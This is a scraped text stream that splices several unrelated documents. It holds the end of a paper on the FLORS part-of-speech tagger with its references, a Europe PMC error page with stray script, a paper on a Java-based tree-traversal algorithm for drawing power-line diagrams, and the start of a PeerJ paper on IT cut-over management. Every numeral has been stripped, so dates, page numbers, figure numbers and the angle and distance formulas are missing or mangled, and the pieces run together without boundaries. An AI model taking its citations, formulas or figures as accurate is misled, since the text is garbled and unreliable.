data. instance weighting. instance weighting formal- izes da as the problem of having data from differ- ent probability distributions in each domain. the goal is to make these two distributions align by us- ing instance-specific weights during training. jiang and zhai ( ) propose a framework that integrates prior knowledge from different data sets into the learning objective by weights. in related work, c&p train generalized and domain-specific models. an input sentence is tagged by the model that is most similar to the sentence. flors could be easily extended along these lines, an experiment we plan for the future. in terms of the basic classification setup, our pos tagger is most similar to the svm-based approaches of giménez and màrquez ( ) and c&p. how- ever, we do not use a left-to-right approach when tagging sentences. moreover, svmtool trains two separate models, one for oovs and one for known words. flors only has a single model. in addition, we do not make use of ambiguity classes, token-tag dictionaries and rare feature thresholds. instead, we rely only on three types of features: distributional representations, suffixes and word shapes. the local-context-only approach of svmtool, c&p and flors is different from standard se- quence classification such as memms (e.g., rat- naparkhi ( ), toutanova et al. ( ), tsuruoka and tsujii ( )) and crfs (e.g., collins ( )). sequence models are more powerful in theory, but this may not be an advantage in da because the sub- tle dependencies they exploit may not hold across domains. conclusion we have presented flors, a new pos tagger for da. flors uses robust representations that work especially well for unknown words and for known words with unseen tags. flors is simpler and faster than previous da methods, yet we were able to demonstrate that it has significantly better accu- racy than several baselines. acknowledgments. this work was supported by dfg (deutsche forschungsgemeinschaft). references john blitzer, ryan mcdonald, and fernando pereira. . domain adaptation with structural correspon- dence learning. in emnlp, pages – . avrim blum and tom mitchell. . combining la- beled and unlabeled data with co-training. in colt, pages – . thorsten brants. . tnt: a statistical part-of-speech tagger. in anlp, pages – . peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, : – . minmin chen, kilian q. weinberger, and john blitzer. . co-training for domain adaptation. in nips, pages – . jinho d. choi and martha palmer. . fast and robust part-of-speech tagging using dynamic model selection. in acl: short papers, pages – . michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in emnlp, pages – . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. the journal of machine learning research, : – . rong-en fan, kai-wei chang, cho-jui hsieh, xiang-rui wang, and chih-jen lin. . liblinear: a li- brary for large linear classification. the journal of machine learning research, : – . steven finch and nick chater. . bootstrapping syn- tactic categories using statistical methods. in back- ground and experiments in machine learning of nat- ural language, pages – . radu florian, hany hassan, abraham ittycheriah, hongyan jing, nanda kambhatla, xiaoqiang luo, nicolas nicolov, and salim roukos. . a statisti- cal model for multilingual entity detection and track- ing. in hlt-naacl, pages – . kuzman ganchev, keith hall, ryan mcdonald, and slav petrov. . using search-logs to improve query tag- ging. in acl: short papers, pages – . jesús giménez and lluís màrquez. . svmtool: a general pos tagger generator based on support vector machines. in lrec, pages – . fei huang and alexander yates. . distributional representations for handling sparsity in supervised sequence-labeling. in acl-ijcnlp, pages – . fei huang and alexander yates. . exploring representation-learning approaches to domain adapta- tion. in danlp, pages – . fei huang and alexander yates. . biased repre- sentation learning for domain adaptation. in emnlp- conll, pages – . zhongqiang huang, vladimir eidelman, and mary harper. . improving a simple bigram hmm part- of-speech tagger by latent annotation and self-training. in naacl-hlt: short papers, pages – . jing jiang and chengxiang zhai. . instance weight- ing for domain adaptation in nlp. in acl, pages – . s. sathiya keerthi and chih-jen lin. . asymptotic behaviors of support vector machines with gaussian kernel. neural computation, ( ): – . sandra kübler and eric baucom. . fast domain adaptation for part of speech tagging for dialogues. in ranlp, pages – . percy liang, hal daumé iii, and dan klein. . structure compilation: trading structure for features. in icml, pages – . percy liang. . semi-supervised learning for natural language processing. master’s thesis, massachusetts institute of technology. christopher d. manning. . part-of-speech tagging from % to %: is it time for some linguistics? in cicling, pages – . mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . david mcclosky, eugene charniak, and mark johnson. . reranking and self-training for parser adapta- tion. in acl, pages – . john miller, manabu torii, and vijay k. shanker. . building domain-specific taggers without annotated (domain) data. in emnlp-conll, pages – . slav petrov and dan klein. . improved inference for unlexicalized parsing. in hlt-naacl, pages – . slav petrov and ryan mcdonald. . overview of the shared task on parsing the web. notes of the st sancl workshop. lev ratinov and dan roth. . design challenges and misconceptions in named entity recognition. in conll, pages – . adwait ratnaparkhi. . a maximum entropy model for part-of-speech tagging. in emnlp, pages – . alexander m. rush, roi reichart, michael collins, and amir globerson. . improved parsing and pos tagging using inter-sentence consistency constraints. in emnlp-conll, pages – . beatrice santorini. . part-of-speech tagging guide- lines for the penn treebank project ( rd revision, nd printing). technical report, department of linguistics, university of pennsylvania. tobias schnabel and hinrich schütze. . towards robust cross-domain domain adaptation for part-of- speech tagging. in ijcnlp, pages – . hinrich schütze. . part-of-speech induction from scratch. in acl, pages – . hinrich schütze. . distributional part-of-speech tagging. in eacl, pages – . anders søgaard. . semisupervised condensed near- est neighbor for part-of-speech tagging. in acl: short papers, pages – . amarnag subramanya, slav petrov, and fernando pereira. . efficient graph-based semi-supervised learning of structured tagging models. in emnlp, pages – . kristina toutanova, dan klein, christopher d. manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in naacl- hlt, pages – . yoshimasa tsuruoka and jun’ichi tsujii. . bidirec- tional inference with the easiest-first strategy for tag- ging sequence data. in emnlp-hlt, pages – . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in acl, pages – . shulamit umansky-pesin, roi reichart, and ari rap- poport. . a multi-domain web-based algorithm for pos tagging of unknown words. in coling, pages – . jakob uszkoreit and thorsten brants. . distributed word clustering for large scale class-based language modeling in machine translation. in acl, pages – . wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design of electric power line drawing algorithm sun pengzhan school of computer science and engineering xi'an technological university xi’an, , china e-mail: @qq.com lei juchao school of computer science and engineering xi'an technological university xi’an, , china e-mail: leijuchao@ .com abstract—at present, the drawing of power lines is still in the state of semi-manual design, mainly completed by autocad, which not only consumes human resources, but also has low efficiency. therefore, this paper designs an automatic drawing software for power lines. it integrates drawing and data management. based on the basic information of power lines, this software imports and automatically converts the basic power data (latitude and longitude data) containing gps/ beiddou positioning information into the distance, direction, angle and other information of poles and cables. then, it realizes the function of automatically drawing the power line graph according to the scale by multiple tree traversal algorithm. this software is easy to operate and reliable, and has achieved good results in practice. keywords-power lines; automatic drawing; the database; multiple tree; traversal algorithm i. introduction the power grid is directly facing the end users and is closely related to the production and life of the people. it is an important public infrastructure to serve the people's livelihood. in recent years, with the development of new-type urbanization, china has been committed to the construction and renovation of power grid, so as to realize reliable power supply, high-quality service and improve supply efficiency. power grid construction and reconstruction has become an urgent task of the current power industry. after the completion of the power grid transformation, the power supply enterprises need to draw and archive the power line diagram, which is usually drawn semi-manually by autocad. however, autocad requires professionals to use different drawing tools to draw on the software when drawing, and if it is necessary to change the position of a pole or change the information of a power line, it needs to be redrawn. therefore, this kind of design method's shortcoming is obvious, not only the design workload is big, time-consuming, laborious, the efficiency is low, moreover has not been able to adapt to the electronic age development demand[ - ]. in order to realize the convenient drawing function, this paper designs and implements an automatic drawing software for power lines. the system can calculate various parameter information in the line through gps data (longitude and latitude data) and store it in the database. then it will automatically generate a standard and beautiful power circuit diagram according to the information stored in the database. if some information needs to be changed after the completion of power grid construction and reconstruction, only the corresponding data need to be changed to automatically draw again. this software provides a strong guarantee for reducing labor intensity, improving work efficiency and plotting quality, and shortening plotting cycle. ii. power line structure analysis power equipment mainly includes generator set, power distribution device, lighthouse bridge column, fuse, transformer, transformer table, automatic control device, watt-hour meter, high-voltage switch, high-voltage circuit breaker, capacitor, lightning arrester, current transformer, voltage transformer, cable line, power line, etc. since the generator set is not fixed on the power line, the power line mentioned in this system mainly refers to the line composed of outdoor poles, cables and transformer stations (including box transformers). due to the wide coverage area of outdoor lines, the complex and changeable environment, and the diversified routing modes of the lines, the factors to be considered in drawing are also relatively complex. however, no matter how complicated and diverse the actual power lines are, all power lines are connected to the user end through transformer outgoing lines and several poles, so the power lines are essentially standard multi-branch tree structures. as shown in fig. , the power line in each area is essentially a mailto:yangyh @qq.com international journal of advanced network, monitoring and controls volume , no. , multi-branch tree with transformer as root node (node ), and each pole in the line is a node of the multi-branch tree, i.e. t = { , , , , , , , } is a tree with root . the other nodes except the root node can be divided into n disjoint finite sets, each set is a subtree of the root node[ ]. figure . schematic diagram of power line multi-branch tree structure in the actual drawing process, whether manual drawing or automatic drawing, transformer is generally selected as the starting point. the process is: starting from the starting point to find the next pole connected to it through the relationship between the nodes, get the parameters of the node and the parent node, such as the distance, rotation angle, steering and other parameters, and then calculate the relative coordinates of the node. this drawing process is also very similar to the traversal process of a multi-fork tree, which provides the possibility for the realization of automatic power drawing. in the actual circuit drawing process, the four basic data sources of gear length, angle, steering, and pole number can be obtained during power grid reconstruction or power grid construction, or gps can be used to obtain the latitude and longitude information of the pole and then converted to span, veer and angle. the automatic drawing of power lines can be realized by processing the four parameters in the database while traversing each node, calculating the relative coordinates of each node and converting them into absolute coordinates. iii. power line automatic drawing function design a. traversal of multi-fork trees since the relationship between transformer and pole is tree structure, when drawing circuit diagram, this multi-branch tree can be constructed by traversing power lines and all nodes in the tree can be processed one by one. therefore, it has the possibility to realize the automatic drawing of power line graphics. common multi-tree traversal can be divided into two types: level-first traversal and depth-first traversal. depth first traversal can be divided into: first order traversal, middle order traversal, and second order traversal. its principle is to traverse the nodes of the tree along its depth and search the branches of the tree as deep as possible. hierarchy priority traversal is to traverse the nodes of the tree according to hierarchy. its principle is to first visit the root node and find all its children. these sub-nodes are also the root nodes of the sub-tree, so these nodes are accessed again, and so on and so forth, in order of first, second, third, etc[ ]. b. power line traversal algorithm although the power line graph has a multi-branch tree structure, there are many problems in the actual traversal operation. in the past multi-tree applications, whether it is depth traversal or hierarchical traversal, the node stores the node's sub-node information when it is stored, so its sub-nodes can be directly found by accessing the node, and traversal can be completed from top to bottom. however, in power lines, because each pole node only knows its parent node but not its child node and has no other relationship information, it is difficult to determine the location of other nodes except the root node, so the traditional traversal algorithm is not applicable. in order to solve this problem, this research has made some improvements on the basis of the hierarchical traversal algorithm. because the information of each node's parent node is clear, we can easily find all the nodes with the same parent node. this research is based on this point to achieve top-down traversal. first, create an instance class object “tree”, which represents that each row of data in the database is an instance object in java, and create an attribute “children” in the instance object tree to save all child nodes of the current node. second, get the data in the database to the instance object, and save all the international journal of advanced network, monitoring and controls volume , no. , instance objects in the list collection. the specific traversal algorithm is to find the root node and put it into the result, and use the children attribute to find all the child nodes of the current layer from top to bottom through recursion, and save them in the result. recursive traversal code is as follows. //store all node data information object collection list result = new arraylist(); //query node data information list lists = new testjdbc().queryall(); //traverse to determine whether it is the root node for (tree tree : lists) { if(null == tree.getpid()) { result.add(tree); } } // recursive call judgment function for (tree parent : result) { parent = recursivetree(parent, lists); } //judgment function adds an object to the child attribute of the parent node object public static tree recursivetree(tree parent, list list) { for (tree tree : list) { if(parent.getid().equals(tree.getpid())) { tree = recursivetree(tree, list); parent.getchildren().add(tree); } } return parent; } c. calculation of plane coordinates the purpose of traversal is not only to construct the multi tree, but also to locate the coordinates of the traversal nodes. it is very important to convert the latitude and longitude data of the pole to the coordinate points in the plane rectangular coordinate system because it is impossible to draw the figure directly by gps. in order to draw the figure accurately in the plane coordinate, first we must convert the longitude and latitude data into the plane coordinate data, and calculate the angle and the distance between the two points through the longitude and latitude data[ ]. with poles a and b, the following calculation methods can be obtained through the derivation of mathematical geometric formula to realize data conversion. ( ) the calculation method of the angle formed by two points a and b is as follows:  arctan( ) ja jb wa wb         among them, θ is the angle (degree) between a and b, ja is the longitude of point a, jb is the longitude of point b, wa is the latitude of point a, wb is the latitude of point b. ( ) the calculation method of the distance between two points a and b is as follows:  *acrsin sin ( ) ( ) ( ) * cos( ) *sin ( ) l r wa wb ja jb cos wa wb       among them, l is the distance between points a and b (m), r is the earth radius ( km), ja is the longitude of point a, jb is the longitude of point b, wa is the latitude of point a, wb is the latitude of point b. according to the calculation results of formulas ( ) and ( ), the storage in the database is shown in figure . during traversal, the coordinates are located from the starting point, and then each child node of the node is found by traversal algorithm. the relative coordinates of the nodes are calculated by the span, rotation angle and steering parameters between the child node and the parent node. due to the need to modify the relevant information of the pole during the traverse process, in order to ensure the integrity and reliability of the original database and improve the speed of database traversal, the information of relevant substation should be saved in the temporary database before the actual traversal[ - ]. the traversal process is as follows. international journal of advanced network, monitoring and controls volume , no. , ( ) using sql "select into temporary table from original table where change table name" command to create temporary data table and copy the change table data information to be drawn to the temporary table. ( ) find the starting point "transformer" of the transformer in the temporary data table, and set the starting point coordinate of the drawing as   ,x y according to the actual position of the transformer in the transformer. figure . storage in a database ( ) find the distribution board connected with the transformer, calculate the coordinates   ,x y of the distribution board according to the distance between the distribution board and the transformer, the steering and the steering angle, mark in the temporary database that the relative position coordinates of the node and the parent node have been calculated, and mark in the parent node that the child node coordinates of the parent node have been calculated. ( ) execute the cycle in the temporary database to select the relative coordinates of this node and the parent node have been calculated, but the poles of the coordinates of the child nodes have not been calculated. ( ) repeat step ( ) until all poles are traversed. in the process of traversal, every record in the database must participate in multiple operations. if there are many poles in a substation, the cycle of traversal operation may be too long. therefore, in the actual traversal operation, it may be faster to use the stored procedure of the database to complete this work. iv. generation of power circuit diagram after traversal calculation and plane coordinate positioning, the actual drawing results also need to display other relevant information for users. therefore, the following work should be completed before automatically generating circuit drawing. ( ) traverse from the starting point (transformer) to calculate the power supply radius of each pole. ( ) draw title block, mark drawing scale, drawing date, type and quantity of various poles, model and length of conductor, number of meter boxes, maximum power supply radius, etc. ( ) statistics of the types, specifications, quantities of various poles in the substation, the length of wires of various specifications and types, the number of various meter boxes (power meter boxes and lighting meter boxes), etc. ( ) according to the requirements of the power supply enterprise, the pole will be represented as "○", and the container will be represented as "□". ( ) walk through the database again and draw the line diagram from the starting point. a multi-fork tree structure with transformer as the root node line as the path and pole as the node is established by analyzing the demand of power supply enterprises for the drawing and archiving of power circuit diagrams and combining with the characteristics of power lines. after identifying the information stored in the database, a hierarchical traversal algorithm based on multi-tree is proposed. in the process of drawing, only four parameters of node need to be processed : span, veer, angle and id number. and then the relative coordinates of each node are calculated and converted into absolute coordinates by using a multi-tree layer traversal algorithm, so that the automatic drawing of power lines can be realized. then, the relative coordinates of each node are calculated and converted into absolute coordinates by using a multi-tree layer traversal algorithm, so that the automatic drawing of international journal of advanced network, monitoring and controls volume , no. , power lines can be realized. the drawing method discussed in this paper has been successfully applied to many power supply enterprises in our country. figure shows the circuit diagram of a certain substation automatically generated. figure . circuit diagram of a transformer station automatically generated v. conclusion the system manages power line parameter data through a database, and realizes the function of automatically drawing power graphs according to the proportion set by users, thus saving human resources. it can quickly change the information in the database when the information about a power line is changed. therefore, it can well meet the needs of china's power grid reconstruction with short drawing cycle and high working efficiency. this system has achieved good results in the practical application of power supply enterprises in many places. references [ ] peng liangyong, li xiaodan. realization of fast coordinate transformation method for cad graphics [j]. surveying and mapping and spatial geographic information, , ( ): - . [ ] li huiping, he lianfang. discussion on the teaching of auxiliary modules of autocad software [j]. journal of higher education, ( ): - + . [ ] peng qiwei, zhang hao. adaptive relay algorithm for medium voltage distribution line carrier based on multitree traversal [j]. power system communication, , ( ): - . [ ] wang fangxiu, liu chunhong. a new algorithm for constructing binary tree by hierarchical traversal and other traversal [j]. journal of wuhan university of light industry, , ( ): - . [ ] zhao xiang, chen yan. a coordinate transformation algorithm in geographic information system [j]. computer and network, ( ): - . [ ] data structure and algorithm [m]. beijing university of aeronautics and astronautics press, yu xiaomin, . [ ] kou chunpeng. design and implementation of sqlserver database information acquisition system [d]. beijing university of chemical technology, . a framework for cut-over management submitted august accepted october published november corresponding author guido nageldinger, guido.nageldinger@ottogroup.com academic editor letha etzkorn additional information and declarations can be found on page doi . /peerj-cs. copyright nageldinger distributed under creative commons cc-by . open access a framework for cut-over management guido nageldinger department of testing and release management, otto (gmbh & co kg)—a member of the otto group, hamburg, germany abstract the purpose of this paper is to provide a governance structure for it-related projects in order to assure a safeguarded and timely transition to a productive environment. this transitioning, which rarely exceeds a weekend, is colloquially called ‘cut-over’, ‘rollout’ or ‘deployment’. the governance structure is defined in accordance with a set of project-specific deliverables for a cascade-type procedural project-management model, which is integrated within an information technology infrastructure library (itil)-orientated service organization. this integration is illustrated by the use of a semi-agile release model. due to the release model selected, which is particularly characterized by its bundling of projects for a release-specific rollout (as it is referred to in the project documentation), a new definition and interpretation of deployment from a generic itil perspective is required. the facilitated release model requires a distinction between a project-specific cut-over and a release-specific rollout. this separation gives rise to two types of go-live scenarios: one for each participating project and one for each release. additionally, an interplay between cut-over planning for a project and rollout planning for a release becomes apparent. projects should already incorporate cut-over related deliverables in the initial planning phase. even though consulting methodologies such as asap (accelerated sap), recommend scattered, project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to prepare systematically for a project-specific cut-over with all required deliverables. the framework provided maps out itil’s release and deployment process by means of it projects; furthermore it allows it projects to interface easily with the itil change-management process. subjects computer architecture, theory and formal methods, software engineering keywords release, project-specific cut-over, release-specific rollout, go-live preparation, go-live, deployment, application-specific cut-over, itil, it service management, it project management introduction most it-related projects, in particular implementation and software development projects, change a productive system landscape when taken live. on the one hand these projects face the challenge of delivering a change (within an itil context) in a timely and cost-effective manner. on the other hand, it organizations need to assure the integrity of the system landscape and are required to minimize potential interference to the ongoing business, as service level agreements (slas) need to be fulfilled. the central computing and telecommunications agency (ccta), a government agency in great britain, already developed the information technology infrastructure how to cite this article nageldinger ( ), a framework for cut-over management. peerj comput. sci. :e ; doi . /peerj-cs. mailto:guido.nageldinger@ottogroup.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. library (itil) at the end of the s. the latest update of itil v was published in which is frequently referenced as itil . is it still relevant? yes, because it helps bring order to it chaos. proehl et al. ( ) analyzed articles in the field of it service management. they also confirmed the work by shahsavarani & ji ( ). both studies found a growing number of published papers dealing with the development of concepts, constructs, models, methods and implementations for theory development. performance issues in it service management, justifications, and it infrastructure library topics are among the most popular topics of research. only a few articles have used or developed theories. marrone et al. ( ) found organizations adopting itil implemented more operational level processes than the tactical/strategic level processes. the study utilizes survey responses from the uk, usa, dach (german-speaking countries) and australia. itil is rarely seen in isolation and current research focuses on the integration with it governance standards, such as iso/iec and other methodologies, such as cobit, prince and the iso x-family (tanovic & orucevic , ; shivashankarappa et al., ; jäntti et al., ; larsson, rusu & aasi, ). itil’s release and deployment management processes are demanding. jokela & jäntti ( ) as well as lahtela & jaentti ( ) identified within their case studies the following common challenges: • no existing process for product portfolio release and deployment management • lack of communication • unclear release and deployment management and/or product portfolio management process roles • lack of resources and time for product portfolio integration, testing and reviewing • existing models and practices are not suitable for agile software development • uncertainty about of the contents of release packages • high release distribution frequency • different and tailored release packages • the change management is not up to date and • no existing service catalog. the project-specific cut-over, as defined in more detail below, requires detailed planning, many meetings and several agreements with all stakeholders involved. which questions need to be addressed? here are just some of them: • how should the project outcomes be transferred to operation? • which scenario provides the best compromise between time, cost and risk? • what happens if the cut-over fails? • how can the previous system condition or version be reinstalled in case cut-over fails? • how can we ensure that projects start early enough, with all the necessary preparation work? nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. • how can cut-over activities be aligned within an it service organization? • how do we measure the success of the cut-over–and how can we maximise it? unfortunately, answers and activities associated with these cut-over related topics are frequently addressed too late, probably because the cut-over is one of the final steps in projects and can therefore be hidden for a long time. if a cut-over and its associated deliverables are not integrated within the overall project plan then projects are at risk of being delivered too late. for this reason, there is an urgent business need to govern projects in such a manner that they do not forget to cover cut-over related items. so, which items should projects cover? this question and many others are addressed by a ‘framework for deployment management’ as referred to below in this document. the purpose of this paper is to provide a methodology which assures a robust and timely go-live for projects. an itemised objective overview: • to list the key deliverables projects need to provide in order to assure a timely and safe go-live • to illustrate how these deliverables can be integrated within the itil release and deployment process • to look into different deployment types, which this paper refers to as (a) project-specific cut-over, (b) application-specific cut-over and (c) release-specific rollout along with the timeframes and timepoints involved, and lastly • to present a framework which enables an it-service organization to transition a project to a productive environment. the scope of the deployment framework introduced is required • to be applicable within an information technology infrastructure library (itil)- orientated service organization, and • to extend commonly facilitated project-management methodologies. as with most management practices, there are always more ways to achieve similar results with other approaches. however, in order to examine and establish good management practice, these methodologies need to be published to facilitate comparison. the framework published here is just one of many potential options. it illustrates how deployment activities can be harmonised with commonly facilitated it projects as well as quality-management practices, and integrated in an itil environment. even though it is possible to take advantage of the deployment framework presented here without itil, many companies have adopted itil recommendations and best practices and are organized in a service-orientated manner. it projects are therefore unlikely to exist in isolation and are more likely to be embedded in a service-orientated manner. itil is known to be generic and by itself is not complete. its purpose is not to provide advice on how to implement it service management processes. instead it requires integration with other disciplines such as project management and quality management. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the framework presented here in the form of an illustrative case study arose during my consultancy work and has been implemented for some applications within the department of testing and release management of otto (gmbh & co kg) which is a member of the otto group. it is not a hypothetical model. projects which wish to cut-over in form of a release-specific rollout are requested to comply with this framework. within every release between to projects are participating. six release-specific rollouts are conducted every year. even though consulting methodologies such as asap (accelerated sap) recommend scattered project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to systematically prepare for a project-specific cut-over with all required deliverables. the framework provided extends the itil release and deployment process by means of it projects and allows it projects to interface easily with the itil change-management process. the activities of the otto group, with its headquarters located in hamburg, germany, are grouped into three main business areas: (i) multichannel retail, (ii) financial services and (iii) service. this structure is consistently reflected in the group’s activities along the retail value chain, in logistics for instance. in the year / , the group generated consolidated revenue of more than billion euros and employed about , staff worldwide. project-specific cut-over versus release- specific rollout itil is often facilitated as a checklist. with regard to the release and deployment process, it consists of the following steps (rance, ): • plan and prepare a release • build and test a release • plan and prepare deployment • conduct deployment • conduct review, and • provide early-life support. due to its generic nature and the need to interface with other disciplines, it-service organizations implement these steps quite differently. the variability of implementation options may be caused by different interpretations of the term ‘release’, which is also related to the term ‘change’. how does itil define these terms? the term ‘release’ is defined as: “one or more changes to an it service that are built, tested and deployed together. a single release may include changes to hardware, software, documentation, processes and other components.” (axelos, ). the term ‘change’ is defined as: “the addition, modification or removal of anything that could have an effect on it services. the scope should include changes to all architectures, processes, tools, metrics and documentation, as well as changes to it services and other configuration items.” (axelos, ). nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of a semi-agile release model. example of a semi-agile release model with its project and rollout view and relation to itil’s application management, problem & incident management as well as change management. in order to safeguard the related system landscape as well as associated services, conventions need to be outlined on the practical arrangement and organization of release-related changes. here, the term ‘release-model’ is facilitated for a set of rules and conventions used to bundle and organize a release. figure illustrates a semi-agile release model, which is used within this publication as an example to address some dependencies (nageldinger, ). this release model is called ‘semi-agile’ here because it consists of an agile section and a release phase, which follows a classical sequential pattern (cascade model). during the agile period, phases between projects are non-clocked. project phases which fall within the agile period relate to the project planning, design and realization section, and can be conducted in sprints. once these projects participate in an integration test, then their phases need to be clocked. independently of which release model is facilitated, the release phase will most likely consist of (i) an entry gate, (ii) technical and business-related integration tests with their acceptance procedures, and (iii) the release-specific rollout (see fig. ). let us now look at the deployment types. in case the bundling of projects is foreseen by the release model, such as in the one presented here, then we encounter deployment related to the release as well as deployment related to participating projects. itil does not distinguish between these. here, the term ‘deployment’ (axelos, ) is defined as “an activity responsible for movement of new or changed hardware, software, documentation, process etc. to the live environment. deployment is part of the release and deployment management process.” it can probably be argued that such a distinction is unnecessary, since all bundled projects are to be deployed in the same time slot. however, the project-specific deployment and its associated preparation work are owned by the nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure release phase and rollout window. illustration of the release phase and the positioning of the rollout window. project manager and, in the case of larger projects, by a designated cut-over manager. according to itil the release and deployment manager owns the release and its associated deployment. itil’s definition of ‘deployment’ lacks conceptual clarity. this is because if we look only at the movement of software to the live environment then we also need to distinguish between the actual movement and its use when the software is ‘switched on’. this is necessary if legal changes come into effect at a specific point in time, for example, but the software is required to be moved to the live environment beforehand. for the purposes of this paper the term ‘deployment’ from now on is solely used to refer to the movement of software to the live environment, which is commonly conducted within a restricted timeframe. the term ‘point-of-use’ is facilitated to account for the point in time in which the software is ‘switched on’. in order to safeguard our system landscape and associated services we need to monitor both the deployment (timeframe) and point(s)-of-use (point in time). in the context of a release, one deployment and potentially more points-of-use are scheduled. this aspect is elaborated further below in the discussion of the release-change. besides the participating projects, a release additionally includes service packs (a phrase used for minor upgrades), bug fixes and smaller system-related features. these non-project elements are usually governed by separate changes. all ingredients of a release should provide the option of independent transitioning to the productive environment. if this option is not provided, then projects or non-project elements cannot easily be excluded from the release if they fail the integration test. smaller projects are likely to be bundled in form of a release, and then transitioned to a productive environment in form of a release-specific rollout. major it implementation projects are preferably transitioned to a productive environment independently, in order to reduce complexity. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the term ‘project-specific cut-over’ defines the transition of a project to a productive environment. it relates to the project as a whole and includes the software deployment and its point of use. the actual timeframe associated with the project-specific cut-over is called the ‘cut-over window’. the ‘release-specific rollout’ defines the collective transition of bundled projects to a productive environment. in the same way, the associated timeframe is called the ‘rollout window’ (nageldinger, ). frequently, projects communicate what is frequently called a ‘go-live date’ on their overall project chart. in view of the reasons given above, this could mean (i) end of the software deployment, (ii) end of cut-over window, which relates to the transitioning of the whole project, or (iii) point-of-use. it is therefore recommended to question what exactly this date refers to. beside the project-specific cut-over and the release-specific rollout we are most likely to face a third transitioning aspect, here called the ‘application-specific cut-over’: this relates to a specific system or application and mainly covers approaches related to maintenance or upgrades. it differs from the project-specific cut-over in that it consists of canonical (i.e., reoccurring with every rollout) activities and tasks. the deployment of service packs can be organized canonically, for example. within an sap context the term ‘rollout’ is frequently associated with a so-called ‘template approach’. in this, the core configuration is embedded within a reusable template and the country-specific characteristics are added separately in the form of a local configuration (sap, ). sap’s usage of the term ‘rollout’ is quite similar to the definition provided here and its associated release context. this is because the release-specific rollout also consists of reoccurring activities, here referred to as “application-specific cut-over”, which is similar to sap’s template approach. the project-specific cut-over activities, which are non-reoccurring, may be considered in the same way as sap’s country-specific characteristics. the cut-over schedule is a list of tasks and activities required in order to conduct the cut-over. it differs from the ordinary overall project schedule as it only focuses on tasks and activities within the cut-over window, of short duration and lasting only for a couple of hours or a weekend. the cut-over schedule is created by duration-based scheduling techniques. additionally, it contains a list of prerequisites, such as the delivery of training courses and the installation of printers etc. these prerequisites need to be completed before the actual cut-over can be conducted and are part of the overall project schedule. the cut-over schedule does not relate to the post go-live phase. for this objective projects need to have a separate plan, which for example addresses aspects of support, data-conservation and accounting closure procedures. besides the cut-over schedule the cut-over plan contains a variety of other deliverables, in the same way as a project-management plan, which are further elaborated below. key elements of a cut-over schedule are for example termination points, frequently called ‘points-of-return’ (por). theses pors aim to trigger activities used (i) to restore the initial condition or (ii) incrementally fall back to a previous por. the last por is referred to as the ‘point-of-no-return’ (ponr). the ponr does not always fall within the cut-over nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure visualization of the cut-over window. window. the fallback concept is the name of a document used to describe activities which are potentially necessary at these pors, in case the system needs to be rolled back to a previous state or even its initial state. if the cut-over activities pass the ponr then we enter the disaster scenario. for such events, a disaster-recovery concept defining appropriate measures should be in place. the disaster-recovery concept is mentioned here because it is unfortunately frequently neglected. it is regularly associated with earthquakes, hurricanes or terrorist attacks. however, unforeseen events during a cut-over after the ponr can also trigger the disaster scenario (bsi, ). the cut-over window is illustrated in fig. . the sections above clarify why certain release-models, which foresee the bundling of projects for collective rollout, require at least two perspectives—a project-specific and a release-specific one. an important outcome for the preparation of a project-specific cut-over and a release-specific rollout is the go-live scenario. a go-live scenario defines the overall approach on how a cut-over or rollout is to be conducted. the go-live scenarios differ in most cases, which is illustrated by an example in fig. . the go-live scenario of project a utilizes the rollout window of release and , whereas projects b and c merely take advantage of one rollout window. the release-specific rollout also facilitates go-live scenarios. here, the rollout of release uses a sequential rollout strategy, while the rollout of release uses a parallel rollout strategy. recommended deliverables and outcomes for the preparation of a project-specific cut-over this chapter covers recommended deliverables and outcomes for projects in order to prepare for a project specific cut-over. projects are assumed to be arranged in a cascading manner with classic phases, in order to keep this publication as simple as possible. however, as stated above, activities may be undertaken in an agile manner before entering the release phase. nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure illustration of two release-specific rollouts. the go-live strategy of project a utilizes the rollout window of release and , whereas projects b and c 